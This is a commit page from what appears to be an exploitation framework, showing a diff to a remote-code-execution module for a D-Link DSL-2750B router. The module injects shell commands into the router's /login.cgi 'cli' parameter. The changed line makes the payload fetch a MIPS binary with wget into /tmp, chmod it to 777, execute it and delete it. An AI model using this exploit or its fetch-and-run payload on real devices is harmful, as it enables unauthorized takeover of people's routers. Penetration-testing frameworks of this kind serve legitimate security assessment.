Unverified Commit 541ba37f by Marcin Bury Committed by GitHub

Improving exploitation process for dsl_2750b_rce (#421)

parent b0622a29
......@@ -26,7 +26,7 @@ class Exploit(HTTPClient):
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
shell(self, architecture="mipsbe", method="wget", location="/tmp")
shell(self, architecture="mipsbe", method="wget", location="/tmp", exec_binary="chmod 777 {0} && {0} && rm {0}")
def execute(self, cmd):
path = "/login.cgi?cli=multilingual show';{}'$".format(cmd)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment